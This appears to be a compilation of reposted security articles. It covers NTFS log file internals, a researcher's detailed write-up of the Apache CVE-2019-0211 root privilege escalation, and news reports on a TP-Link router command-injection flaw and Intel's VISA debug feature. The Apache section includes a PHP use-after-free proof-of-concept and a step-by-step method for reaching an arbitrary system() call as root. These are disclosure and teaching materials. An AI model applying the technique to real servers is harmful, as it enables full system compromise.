The LFS provides an interface for its clients to store a buffer in a circular (“infinite”) area of a log file and to read such buffers from that log file. In particular, the following simplified types of actions are supported:

  • store a buffer (client data) as a log record, return its log sequence number (LSN);
  • store a buffer (client data) as a restart area, return its LSN;
  • if a log file is full, raise an exception for a client;
  • mark previously stored data as unused;
  • given an LSN, locate a stored buffer (client data) and return it;
  • given an LSN, find a next LSN for the same client and return it (forward search);
  • given an LSN, find a previous LSN for the same client and return it (backward search).

As you can see, the LFS is the data management layer for the NTFS logging component, the LFS doesn’t do the actual logging of metadata operations. Each buffer received from a client is opaque to the LFS (the LFS is only aware of a type of this buffer: whether it’s a log record or a client restart area).

The actual logging (and recovery) is implemented as a part of the NTFS client of the LFS. Each buffer sent from this component to the LFS contains something related to a transaction. Here, a transaction is a set of metadata changes necessary to complete a specific high-level operation.

For example, the following metadata changes are combined as a transaction when a file is renamed:

  1. delete an index entry (with an old file name) for a target file from a file name index within a parent directory;
  2. delete the $FILE_NAME attribute (with an old file name) from a target file record;
  3. create the $FILE_NAME attribute (with a new file name) in a target file record;
  4. add an index entry (with a new file name) for a target file in a file name index within a parent directory.

If all of these changes were applied to a volume successfully, then the transaction is marked as forgotten.

But before we get to the format of metadata changes used by the NTFS client, we need to dissect on-disk structures of the LFS.

First of all, since each client buffer stored in a log file is identified by an LSN, it’s important to understand how these LSNs are generated by the LFS.

Each LSN is a 64-bit number containing the following components: a sequence number and an offset. An offset is stored in the lower part of an LSN, its value is a number of 8-byte increments from the beginning of a log file. This offset points to an LFS structure containing a client buffer and related metadata, this structure is called an LFS record. A sequence number is stored in the higher part, it’s a value from a counter which is incremented when a log file is wrapped (when a new structure is written to the beginning of the circular area, not to the end of this area).

The number of bits reserved for the sequence number part of an LSN is variable, it depends on the size of a log file (and it’s recorded in it).

For example, if 44 bits are reserved for the sequence number part and the LSN is 2124332, then the sequence number is 2 and the offset is 27180 8-byte increments (217440 bytes).

The LSNs have an important property: they are always increasing. An LSN for a new entry is always greater than an LSN for an older entry (technically, these numbers can overflow, but they won’t, because it’s practically impossible to reach the 64-bit limit).

An LFS record is a structure containing a header and client data. The following data is stored in the LFS record header: an LSN for this record, a previous LSN for the same client, an LSN for the undo operation for the same client, a client ID, a transaction ID, a record type (a log record or a client restart area), length of client data, various flags. Many values mentioned before are specified by the client.

LFS records are written to LFS record pages. Each LFS record page is 4096 bytes in size (it’s equal to the page size), it contains a header (the first four bytes are “RCRD”) and one or more LFS records. Since client data can be large, two or more adjacent LFS record pages may be required to store one LFS record (thus, an LFS record can be larger than an LFS record page; only the first segment has the LFS record header).

Each LFS record page is protected by an update sequence array, which is used to detect failed (torn) writes. Here is a description of the protection process (source):

The update sequence array consists of an array of nUSHORT values, where n is the size of the structure being protected divided by the sequence number stride. The first word contains the update sequence number, which is a cyclical counter of the number of times the containing structure has been written to disk. Next are the n saved USHORT values that were overwritten by the update sequence number the last time the containing structure was written to disk.

Each time the protected structure is about to be written to disk, the last word in each sequence number stride is saved to its respective position in the sequence number array, then it is overwritten with the next update sequence number. After the write, or whenever the structure is read, the saved word from the sequence number array is restored to its actual position in the structure. Before restoring the saved words on reads, all the sequence numbers at the end of each stride are compared with the actual sequence number at the start of the array. If any of these comparisons are not equal, then a failed multisector transfer has been detected.

(It should be noted that the stride is 512 bytes, even if an underlying drive has a larger sector size. Also, the size of an update sequence array isn’t n, but n+1.)

Here is the layout of a typical LFS record page:

lfs-record-page

Here is the layout of two LFS record pages containing a large LFS record:

lfs-record-pages

Finally, the circular (“infinite”) area of a log file consists of many LFS record pages. As described before, LFS records written to a log file can wrap, so a large LFS record starting in the last LFS record page also hits the first LFS record page of the circular area.

lfs-infinite.png

When writing a new LFS record into a current LFS record page, existing LFS records in this page can be lost because of a torn write or a system crash. Thus, data that was successfully stored before can be lost because of a new write.

In order to protect against such scenarios, a special area exists in a log file. It’s located before the circular area.

In the version 1.1 of the LFS, a special area consists of two pages, which are used to store two copies of a current LFS record page. Before putting a new LFS record into a current LFS record page, this page is stored in the special area (the first copy). After putting a new LFS record into a current LFS record page, the modified page is also written to the special area (the second copy, the first copy isn’t overwritten by the second one).

If a torn write or a system crash occurs when writing the second copy,  the first copy (without a new LFS record) will be available for the recovery. If everything is okay and the LFS needs the special area for a new update, then the second copy is written to the circular area of a log file (and the special area becomes available for a new update).

These two copies of a current LFS record page are called tail copies (because they always represent the latest LFS record page to be written to the circular area). The latest tail copy isn’t moved to the circular area immediately. So, in order to get a full set of LFS record pages during the recovery, the LFS should apply the latest tail page (or the valid one, if another tail page is invalid) to the circular area.

In the version 2.0 of the LFS, a special area consists of 32 pages. When the LFS needs to put a new LFS record into a current LFS record page or when the LFS prepares a new LFS record page with a single LFS record, the updated page (containing a new LFS record) or the new page is simply written to the special area (to an unused page).

If a torn write or a system crash occurs when writing that page, an older version of the same page from the special area is used. Occasionally, LFS record pages with latest data are moved to the circular area (and corresponding pages in the special area are marked as unused).

I don’t know how LFS record pages in this special area are called. I call them fast pages.

The new version of the LFS requires less writes by reducing the number of page transfers to the circular area. It should be noted that the version of a log file is downgraded to 1.1 during the clean shutdown by default (so an NTFS file system can be mounted using a previous version of Windows).

Also, Microsoft is going to release the version 3.0 of the LFS. This version will be used on DAX volumes. When a log file is mapped in the DAX mode, integrity of its pages is going to be protected using the CRC32 checksum (and there would be no update sequence arrays, because they won’t work well with byte-addressable memory). This will make things faster (no paging writes).

Finally, a log file begins with two restart pages, each one is 4096 bytes in size (again, it’s the page size; the first four bytes for each page are “RSTR”). These pages are also protected with update sequence arrays.

A restart page contains the LFS version number, a page size, and a restart area (not to be confused with a client restart area).

A restart area is a structure containing the latest LSN used (at the time when this structure was written), the number of clients of the LFS, the list of clients of the LFS, the number of bits used for the sequence number part of every LSN, as well as some data for sanity checks and forward compatibility (an offset of the first LFS record within an LFS record page, which is also an offset of the continuation of client data from a previous LFS record page, and a size of an LFS record header; both offsets allow unsupported fields to be ignored in LFS record pages and in LFS records).

A list of clients is composed of client records. A client record contains the oldest LSN required by this client, the LSN of the latest client restart area, the name of this client (as well as other information about this client). Currently, the only client is called “NTFS”.

Two restart pages provide reliability against a possible failure (a torn write or a system crash). These pages aren’t necessary synchronized.

Here is the generic layout of a log file:

lfs-layout.png

When the LFS is asked to provide initial data for its client, it will read and return the latest client restart area according to an LSN recorded in the appropriate client record. (Later, during the logging operation, the LFS won’t touch the oldest LFS record required by each client.)

A client receives its latest restart area, interprets it (remember that the LFS is unaware of the client data format), and decides what actions (if any) must be taken. If a log record is needed, then a client asks the LFS to provide this record (as a buffer) by its LSN.

The NTFS client tells the LFS to write a client restart area at the end of the checkpoint operation. During a checkpoint, the NTFS client writes a set of log records containing data about current transactions followed by a restart area, which points to every piece of that data (using LSNs). During the recovery, the NTFS client uses this data to decide which transactions are committed and which aren’t: committed transaction must be performed again using their redo data (there is a chance that this data didn’t hit the volume), while uncommitted transaction must be rolled back using their undo data.

And now we can take a look at the format of client data!

There are three versions of the NTFS client data format: 0.0, 1.0, and 2.0.

The last one seems to be under development, because it’s not enabled yet. This new version removes redundant open attribute table dumps and attribute names dumps, which were previously made during a checkpoint (the same data can be reconstructed from log records, so there is no reason to waste the space and link these dumps to a client restart area).

Currently, only the first two versions are used: 0.0 and 1.0. There are no significant differences between them. The most notable difference, although not a really significant one, is the format of open attribute entries.

A client restart area contains major and minor version numbers of the NTFS client data format used, an LSN to be used as a starting point for the analysis pass (when the NTFS driver builds a table of transactions and a table of dirty data ranges). Also, a client restart area contains LSNs for a transaction table dumped to a log file from memory (this table can be absent as well), an open attribute table dumped to a log file from memory, a list of attribute names dumped to a log file from memory, and a dirty page table dumped to a log file from memory (which is used to track dirty data ranges).

An open attribute table and a list of attribute names reference a nonresident attribute opened for a log operation. An entry from an open attribute table contains an $MFT reference number for a file record which nonresident attribute has been opened and a type code of this attribute (e.g, $DATA). An entry from a list of attribute names contains a Unicode name of a nonresident attribute opened along with an index of a corresponding entry in the open attribute table.

And a log record written during an operation on a nonresident attribute contains an index of a target attribute in the open attribute table. Based on this information (an $MFT file reference, an attribute code, and an attribute name), it’s possible to locate a target attribute. Also, a log record contains an offset within a target attribute at which new data is going to be written.

It should be noted that no table referenced by a client restart area is in the up-to-date state. New items from log records after the client restart area should be accounted in these tables.

A log record is an actual descriptor of a logged operation. A log record contains a redo type and data (can be empty), an undo type and data (can be empty too), a number of a target $MFT file record segment (for operations on resident attributes and on $MFT data in general), an index of a target attribute within the open attribute table (for operations on nonresident attributes), and several fields used to calculate an offset within a target.

Redo data is written when a transaction is committed, undo data is written when a transaction is rolled back (to bring things back to their previous state). There are some exceptions, however: when a nonresident attribute is opened, its open attribute record is stored as redo data and its Unicode name is stored as undo data.

Here is a full list of log operation types (as of Windows 10, build 18323):

Noop
CompensationLogRecord
InitializeFileRecordSegment
DeallocateFileRecordSegment
WriteEndOfFileRecordSegment
CreateAttribute
DeleteAttribute
UpdateResidentValue
UpdateNonresidentValue
UpdateMappingPairs
DeleteDirtyClusters
SetNewAttributeSizes
AddIndexEntryRoot
DeleteIndexEntryRoot
AddIndexEntryAllocation
DeleteIndexEntryAllocation
WriteEndOfIndexBuffer
SetIndexEntryVcnRoot
SetIndexEntryVcnAllocation
UpdateFileNameRoot
UpdateFileNameAllocation
SetBitsInNonresidentBitMap
ClearBitsInNonresidentBitMap
HotFix
EndTopLevelAction
PrepareTransaction
CommitTransaction
ForgetTransaction
OpenNonresidentAttribute
OpenAttributeTableDump
AttributeNamesDump
DirtyPageTableDump
TransactionTableDump
UpdateRecordDataRoot
UpdateRecordDataAllocation
UpdateRelativeDataIndex
UpdateRelativeDataAllocation
ZeroEndOfFileRecord

Here is a decoded transaction used to rename a file (from “aaa.txt” to “bbb.txt”).

It should be noted that updates to some attributes can be recorded partially. For example, an update to the $STANDARD_INFORMATION attribute can record data starting from the M timestamp (and the C timestamp, which is stored before the M timestamp, will be absent in the redo/undo data).

The only thing left is the meaning of every log operation. Not today!


Update (2019-02-17):

How long does it take for old data to become overwritten with new data?

In one of my tests with Windows 10, it took 16 minutes. In another test with Windows 10, it took 5 hours and 20 minutes. In both tests, mouse movements were the only user activity.

CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation

Original text by cfreal

Escalation

2019-04-03

Introduction

From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles.

The vulnerability affects mod_preforkmod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork.

Bug description

In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), scoreboard, which contains various informations such as the workers PIDs and the last request they handled. Each worker is meant to maintain a process_score structure associated with its PID, and has full read/write access to the SHM.

ap_scoreboard_image: pointers to the shared memory block

(gdb) p *ap_scoreboard_image 
$3 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

Example of shared memory associated with worker PID 19447

(gdb) p ap_scoreboard_image->parent[0]
$6 = {
  pid = 19447, 
  generation = 0, 
  quiescing = 0 '\000', 
  not_accepting = 0 '\000', 
  connections = 0, 
  write_completion = 0, 
  lingering_close = 0, 
  keep_alive = 0, 
  suspended = 0, 
  bucket = 0 <- index for all_buckets
}
(gdb) ptype *ap_scoreboard_image->parent
type = struct process_score {
    pid_t pid;
    ap_generation_t generation;
    char quiescing;
    char not_accepting;
    apr_uint32_t connections;
    apr_uint32_t write_completion;
    apr_uint32_t lingering_close;
    apr_uint32_t keep_alive;
    apr_uint32_t suspended;
    int bucket; <- index for all_buckets
}

When Apache gracefully restarts, its main process kills old workers and replaces them by new ones. At this point, every old worker’s bucket value will be used by the main process to access an array of his, all_buckets.

all_buckets

(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408, 
  listeners = 0x7f19db35e9d0, 
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}
(gdb) ptype apr_proc_mutex_t
apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;
    ...
}
(gdb) ptype apr_proc_mutex_unix_lock_methods_t
apr_proc_mutex_unix_lock_methods_t {
    ...
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    ...
}

No bound checks happen. Therefore, a rogue worker can change its bucket index and make it point to the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root.

Vulnerable code

We’ll go through server/mpm/prefork/prefork.c to find out where and how the bug happens.

  • A rogue worker changes its bucket index in shared memory to make it point to a structure of his, also in SHM.
  • At 06:25AM the next day, logrotate requests a graceful restart from Apache.
  • Upon this, the main Apache process will first kill workers, and then spawn new ones.
  • The killing is done by sending SIGUSR1 to workers. They are expected to exit ASAP.
  • Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), workers are not restarted straight away.
  • Instead, we enter the main loop (L933) and monitor dead workers’ PIDs. When an old worker dies, ap_wait_or_timeout() returns its PID (L940).
  • The index of the process_score structure associated with this PID is stored in child_slot (L948).
  • If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as a third argument (L985). As previously said, bucket‘s value has been changed by a rogue worker.
  • make_child() creates a new child, fork()ing (L671) the main process.
  • The OOB read happens (L691), and my_bucket is therefore under the control of an attacker.
  • child_main() is called (L722), and the function call happens a bit further (L433).
  • SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two ports or more, which is often the case since a server listens over HTTP (80) and HTTPS (443).
  • Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control.
  • Privileges are dropped a bit later in the execution (L446).

Exploitation

The exploitation is a four step process: 1. Obtain R/W access on a worker process 2. Write a fake prefork_child_bucket structure in the SHM 3. Make all_buckets[bucket] point to the structure 4. Await 6:25AM to get an arbitrary function call

Advantages: — The main process never exits, so we know where everything is mapped by reading /proc/self/maps(ASLR/PIE useless) — When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DOSing Apache

Problems: — PHP does not allow to read/write /proc/self/mem, which blocks us from simply editing the SHM — all_buckets is reallocated after a graceful restart (!)

1. Obtain R/W access on a worker process

PHP UAF 0-day

Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0day UAF in PHP 7.x (which seems to work in PHP5.x as well):

PHP UAF

<?php

class X extends DateInterval implements JsonSerializable
{
  public function jsonSerialize()
  {
    global $y, $p;
    unset($y[0]);
    $p = $this->y;
    return $this;
  }
}

function get_aslr()
{
  global $p, $y;
  $p = 0;

  $y = [new X('PT1S')];
  json_encode([1234 => &$y]);
  print("ADDRESS: 0x" . dechex($p) . "\n");

  return $p;
}

get_aslr();

This is an UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable using $this.

UAF to Read/Write

We want to achieve two things: — Read memory to find all_buckets‘ address — Edit the SHM to change bucketindex and add our custom mutex structure

Luckily for us, PHP’s heap is located before those two in memory.

Memory addresses of PHP’s heap, ap_scoreboard_image->* and all_buckets

root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p
7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so

(gdb) p *ap_scoreboard_image 
$14 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p all_buckets 
$15 = (prefork_child_bucket *) 0x7f4a9336b3f0

Since we’re triggering the UAF on a PHP object, any property of this object will be UAF’d too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string‘s structure:

(gdb) ptype zend_string
type = struct _zend_string {
    zend_refcounted_h gc;
    zend_ulong h;
    size_t len;
    char val[1];
}

The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we’re interested in: the SHM and Apache’s all_buckets.

Locating bucket indexes and all_buckets

We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate.

Shared memory location and targeted process_score structures

root@apaubuntu:~# cat /proc/6318/maps | grep rw-s
7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052                      /dev/zero (deleted)

(gdb) p &ap_scoreboard_image->parent[0]
$18 = (process_score *) 0x7f4a9323e020
(gdb) p &ap_scoreboard_image->parent[1]
$19 = (process_score *) 0x7f4a9323e044

To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have:

Important structures of bucket items

prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}

apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;

    ...
}

apr_proc_mutex_unix_lock_methods_t {
    unsigned int flags;
    apr_status_t (*create)(apr_proc_mutex_t *, const char *);
    apr_status_t (*acquire)(apr_proc_mutex_t *);
    apr_status_t (*tryacquire)(apr_proc_mutex_t *);
    apr_status_t (*release)(apr_proc_mutex_t *);
    apr_status_t (*cleanup)(void *);
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t);
    apr_lockmech_e mech;
    const char *name;
}

all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr‘s .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr‘s .text.

Since we have knowledge of those region’s addresses through /proc/self/maps, we can go through every pointer in Apache’s memory and find one that matches the structure. It will be all_buckets[0].

As I mentioned, all_buckets‘s address changes at every graceful restart. This means that when our exploit triggers, all_buckets‘s address will be different than the one we found. This has to be taken into account; we’ll talk about this later.

2. Write a fake prefork_child_bucket structure in the SHM

Reaching the function call

The code path to the arbitrary function call is the following:

bucket_id = ap_scoreboard_image->parent[id]->bucket
my_bucket = all_buckets[bucket_id]
mutex = &my_bucket->mutex
apr_proc_mutex_child_init(mutex)
(*mutex)->meth->child_init(mutex, pool, fname)
Call:reach

Calling something proper

To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain:

mutex = &my_bucket->mutex
[object = mutex]

zend_object_std_dtor(object) ht = object->properties zend_array_destroy(ht) zend_hash_destroy(ht) val = &ht->arData[0]->val ht->pDestructor(val)

pDestructor is set to system, and &ht->arData[0]->val is a string.

Call:exec

As you can see, both leftmost structures are superimposed.

3. Make all_buckets[bucket] point to the structure

Problem and solution

Right now, if all_buckets‘ address was unchanged in between restarts, our exploit would be over:

  • Get R/W over all memory after PHP’s heap
  • Find all_buckets by matching its structure
  • Put our structure in the SHM
  • Change one of the process_score.bucket in the SHM so that all_bucket[bucket]->mutex points to our payload

As all_buckets‘ address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure — one for each PID.

Spraying the shared memory

If all_buckets‘ new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of having our prefork_child_bucket structure at a precise point in the SHM, we can spray it all over unused parts of the SHM. The problem is that the structure is also used as a zend_object, and therefore it has a size of (5 * 8 =) 40 bytes to include zend_object.properties. Spraying a structure that big over a space this small won’t help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address in the rest of the shared memory. The impact will be that prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_bucketis relocated not too far from its original address, my_bucket will be in the sprayed area.

Call:exec

Using every process_score

Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change every one of them, so that they cover another part of memory. For instance:

ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00
ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00
ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000

This multiplies our success rate by the number of apache workers. Upon respawn, only one worker have a valid bucket number, but this is not a problem because the others will crash, and immediately respawn.

Success rate

Different Apache servers have different number of workers. Having more workers mean we can spray the address of our mutex over less memory, but it also means we can specify more index for all_buckets. This means that having more workers improves our success rate. After a few tries on my test Apache server of 4 workers (default), I had ~80% success rate. The success rate jumps to ~100% with more workers.

Again, if the exploit fails, it can be restarted the next day as Apache will still restart properly. Apache’s error.logwill nevertheless contain notifications about its workers segfaulting.

4. Await 6:25AM for the exploit to trigger

Well, that’s the easy step.

Vulnerability timeline

  • 2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC
  • 2019-02-25 Acknowledgment of the vulnerability, working on a fix
  • 2019-03-07 Apache’s security team sends a patch for I to review, CVE assigned
  • 2019-03-10 I approve the patch
  • 2019-04-01 Apache HTTP version 2.4.39 released

Apache’s team has been prompt to respond and patch, and nice as hell. Really good experience. PHP never answered regarding the UAF.

Questions

Why the name ?

CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation
DIEM: the exploit triggers once a day

I had to.

Can the exploit be improved ?

Yes. For instance, my computations for the bucket indexes are shaky. This is between a POC and a proper exploit. BTW, I added tons of comments, it is meant to be educational as well.

Does this vulnerability target PHP ?

No. It targets the Apache HTTP server.

Exploit

The exploit is available here.

TP-Link ‘smart’ router proves to be anything but smart – just like its maker: Zero-day vuln dropped after silence

Original text by Thomas Claburn

TP-Link’s all-in-one SR20 Smart Home Router allows arbitrary command execution from a local network connection, according to a Google security researcher.

On Wednesday, 90 days after he informed TP-Link of the issue and received no response, Matthew Garrett, a well-known Google security engineer and open-source contributor, disclosed a proof-of-concept exploit to demonstrate a vulnerability affecting TP-Link’s router.

The 38-line script shows that you can execute any command you choose on the device with root privileges, without authentication. The SR20 was announced in 2016.

Via Twitter, Garrett explained that TP-Link hardware often incorporates TDDP, the TP-Link Device Debug Protocol, which has had multiple vulnerabilities in the past. Among them, version 1 did not require a password.

«The SR20 still exposes some version 1 commands, one of which (command 0x1f, request 0x01) appears to be for some sort of configuration validation,» he said. «You send it a filename, a semicolon and then an argument.»

Once it receives the command, says Garrett, the router responds to the requesting machine via TFTP, asks for the filename, imports it to a Lua interpreter, running as root, and sends the argument to the config_test() function within the imported file.

The Lua os.execute() method passes a command to be executed by an operating system shell. And since the interpreter is running as root, Garret explains, you have arbitrary command execution.

However, while TDDP listens on all interfaces, the default firewall prevents network access, says Garrett. This makes the issue less of a concern that remote code execution flaws identified in TP-Link 1GbE VPN routers in November.

Even so, vulnerability to a local attack could be exploited if an attacker manages to get a malicious download onto a machine connected to an SR20 router.

TP-Link did not immediately respond to a request for comment.

Garrett concluded his disclosure by urging TP-Link to provide a way to report security flaws and not to ship debug daemons on production firmware.

Researchers discover and abuse new undocumented feature in Intel chipsets

Original text by Catalin Cimpanu

Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology.

At the Black Hat Asia 2019 security conference, security researchers from Positive Technologies disclosed the existence of a previously unknown and undocumented feature in Intel chipsets.

Called Intel Visualization of Internal Signals Architecture (Intel VISA), Positive Technologies researchers Maxim Goryachy and Mark Ermolov said this is a new utility included in modern Intel chipsets to help with testing and debugging on manufacturing lines.

VISA is included with Platform Controller Hub (PCH) chipsets part of modern Intel CPUs and works like a full-fledged logic signal analyzer.

PCH
Image: Wikimedia Commons

According to the two researchers, VISA intercepts electronic signals sent from internal buses and peripherals (display, keyboard, and webcam) to the PCH —and later the main CPU.

VISA EXPOSES A COMPUTER’S ENTIRE DATA

Unauthorized access to the VISA feature would allow a threat actor to intercept data from the computer memory and create spyware that works at the lowest possible level.

But despite its extremely intrusive nature, very little is known about this new technology. Goryachy and Ermolov said VISA’s documentation is subject to a non-disclosure agreement, and not available to the general public.

Normally, this combination of secrecy and a secure default should keep Intel users safe from possible attacks and abuse.

However, the two researchers said they found several methods of enabling VISA and abusing it to sniff data that passes through the CPU, and even through the secretive Intel Management Engine (ME), which has been housed in the PCH since the release of the Nehalem processors and 5-Series chipsets.

INTEL SAYS IT’S SAFE. RESEARCHERS DISAGREE.

Goryachy and Ermolov said their technique doesn’t require hardware modifications to a computer’s motherboard and no specific equipment to carry out.

The simplest method consists of using the vulnerabilities detailed in Intel’s Intel-SA-00086security advisory to take control of the Intel Management Engine and enable VISA that way.

«The Intel VISA issue, as discussed at BlackHat Asia, relies on physical access and a previously mitigated vulnerability addressed in INTEL-SA-00086 on November 20, 2017,» an Intel spokesperson told ZDNet yesterday.

«Customers who have applied those mitigations are protected from known vectors,» the company said.

However, in an online discussion after his Black Hat talk, Ermolov said the Intel-SA-00086 fixes are not enough, as Intel firmware can be downgraded to vulnerable versions where the attackers can take over Intel ME and later enable VISA.

Furthermore, Ermolov said that there are three other ways to enable Intel VISA, methods that will become public when Black Hat organizers will publish the duo’s presentation slides in the coming days.

As Ermolov said yesterday, VISA is not a vulnerability in Intel chipsets, but just another way in which a useful feature could be abused and turned against users. Chances that VISA will be abused are low. This is because if someone would go through the trouble of exploiting the Intel-SA-00086 vulnerabilities to take over Intel ME, then they’ll likely use that component to carry out their attacks, rather than rely on VISA.

As a side note, this is the second «manufacturing mode» feature Goryachy and Ermolov found in the past year. They also found that Apple accidentally shipped some laptops with Intel CPUs that were left in «manufacturing mode.»